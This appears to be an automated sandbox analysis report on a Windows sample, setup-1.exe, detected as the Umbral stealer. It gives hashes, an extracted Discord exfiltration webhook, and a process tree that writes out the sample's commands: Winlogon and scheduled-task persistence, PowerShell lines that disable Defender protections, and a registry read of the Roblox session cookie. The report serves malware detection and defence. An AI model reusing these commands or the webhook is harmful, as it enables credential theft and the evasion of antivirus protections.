Analysis
-
max time kernel
15s -
max time network
71s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
29-02-2024 13:48
Static task
static1
Behavioral task
behavioral1
Sample
setup-1.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
setup-1.exe
Resource
win10v2004-20240226-en
General
-
Target
setup-1.exe
-
Size
244KB
-
MD5
88a46f6fad262c425ac411c1f9594c69
-
SHA1
07a58a70278d223165ba22aee94863587ceb4057
-
SHA256
b638a068653a1b5273d6a11c43d97c7cc3febdc3085243760ac9c57e04d35e10
-
SHA512
730549619dd6e8847068c4f569b3d1f9d8b49162d85d8a8a6c4a4151f1a97590d7d59dc91e15497c5ce5d020d53385f8cb8de30e159d5f34718f26ace2272001
-
SSDEEP
6144:epkye1kDlYpAoEjQnZkLdGDB6Hkn2cY3TwaRb7:kknCDSBEjEkLdM6HV3Ma
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1211276511907151963/KjUXY-OO5tQr3VnZNM1_1xmfhFv3JUJtYA090It15YMwQCWI8k2rOR5-d1J0h7UrcBe-
Signatures
-
Detect Umbral payload 4 IoCs
resource yara_rule behavioral2/files/0x0008000000023252-6.dat family_umbral behavioral2/files/0x0008000000023252-28.dat family_umbral behavioral2/files/0x0008000000023252-29.dat family_umbral behavioral2/memory/3088-31-0x000001F3921D0000-0x000001F392210000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\ProgramData\\Microsoft\\Windows\\Templates\\2lurlfhn.fn5.exe" setup-1.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation setup-1.exe -
Executes dropped EXE 1 IoCs
pid Process 3088 2lurlfhn.fn5.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 61 discord.com 62 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 57 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 976 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4040 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3620 PING.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3088 2lurlfhn.fn5.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5044 wrote to memory of 1704 5044 setup-1.exe 97 PID 5044 wrote to memory of 1704 5044 setup-1.exe 97 PID 1704 wrote to memory of 976 1704 CMD.exe 98 PID 1704 wrote to memory of 976 1704 CMD.exe 98 PID 5044 wrote to memory of 3088 5044 setup-1.exe 100 PID 5044 wrote to memory of 3088 5044 setup-1.exe 100 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3052 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup-1.exe"C:\Users\Admin\AppData\Local\Temp\setup-1.exe"1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "System Update" /tr "C:\ProgramData\Microsoft\Windows\Templates\2lurlfhn.fn5.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "System Update" /tr "C:\ProgramData\Microsoft\Windows\Templates\2lurlfhn.fn5.exe"3⤵
- Creates scheduled task(s)
PID:976
-
-
-
C:\ProgramData\Microsoft\Windows\Templates\2lurlfhn.fn5.exe"C:\ProgramData\Microsoft\Windows\Templates\2lurlfhn.fn5.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3088 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\ProgramData\Microsoft\Windows\Templates\2lurlfhn.fn5.exe"3⤵
- Views/modifies file attributes
PID:3052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Templates\2lurlfhn.fn5.exe'3⤵PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵PID:3640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵PID:2972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵PID:4420
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵PID:3828
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:4000
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵PID:2116
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:4040
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\ProgramData\Microsoft\Windows\Templates\2lurlfhn.fn5.exe" && pause3⤵PID:5024
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:3620
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵PID:4324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3756 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:81⤵PID:5076
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3136
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.4MB
MD5ebe3b1a60e138e1ad2c4e91c256b6143
SHA13218136e3229d19a7e223f510ce11ffa1ba65624
SHA256918f4d41dcb8c89a9f09600c4baef831de0779c6bccbb28f5e4b5c402986e13c
SHA512cc0003fb05d5f786c78e584bfb6490774fcdfa21df05bfee78d4078fb692a9cea8d691441a81d59c697b3b4bd166e3671300d108dbd87a39de3cd305727d78c0
-
Filesize
2.3MB
MD5a834ce82b2607968bfd45bdde9037099
SHA1de3e8fc6ae7bea8bdb051c887934eab273fe5508
SHA256805f5a8a9294af08de2d02e6d1b8d4633539e3be2a4d0d99c6964faf579d0773
SHA512caad33d88b64c6f150694e9f18376ddca5c12b7e685ed986d242aa2ad8e9511900a220e37e5798de7bd48c8dc8f0e74921e0f4e4a9bb54b6fac86bde10f06443
-
Filesize
4.1MB
MD5d3f63b566a450b90da13d1c9a5f05878
SHA17241151eddec1c7344037f37d728946245b3d089
SHA256942ec5c780cbd0e1e90ccb041813c91db4c705db8e89a33bc61aebcb99ff36b3
SHA51232fa2b0057939373467e01b8721c3a1c78fa3fd0ee549cff4a2741c0bfa96975dd0cbe50e47e6024911b130797293df2cdbfa18a00db31937502eeed0738df68
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD545fb9d7dd2918093a914fef36f5eeb21
SHA162ada2131906247f7c8c0862f4fcd9750d1334de
SHA256aea229b88071a17a2ac0ea96bdc4e6a632ddb9e5dabf09541117390f1c191869
SHA5122dca3ed9b281b5e97b86d1a7e939986910723a147afe3906b7ca1a224b83a22a378fc10742db96947e7e797ad7244d78985e938ad5eba711989943ba913bd2de
-
Filesize
1KB
MD5aaaeb1918171d7828cd38153cdc134fa
SHA17713dfa7030d1345ae47b7928981e976929815d9
SHA256aec863f784d0c51c49d8c9edfe925edee7aefe7c7ea8b60316818baa8cc7972d
SHA512cab8e0fe67b9f9d4cfd359ef0dbcc7f11d072eeee233e8fd78f8dfe55f556d25cba9cd43ab6611ed643e1bc083ea58265c318bde4499ae46605eee1556712e40
-
Filesize
944B
MD55f0ddc7f3691c81ee14d17b419ba220d
SHA1f0ef5fde8bab9d17c0b47137e014c91be888ee53
SHA256a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5
SHA5122ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3
-
Filesize
948B
MD5eaed10cca27e8533846abc8ff07c9697
SHA1e456b867a79be3d213d85ab820cc7a1ceae8f7e2
SHA2563f803b8ad424712a38fd3f45fa9b367c839cdb2bf2a194c3fe8a87dac0254cdd
SHA5125fb6547b45d065bc63f49989687e7fe06ba31162f99cf37d4a001329049520ec2336173c696f81bbeafeb19e9265f1bd12cf5ec8d6f11c570845b293160a8ba9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82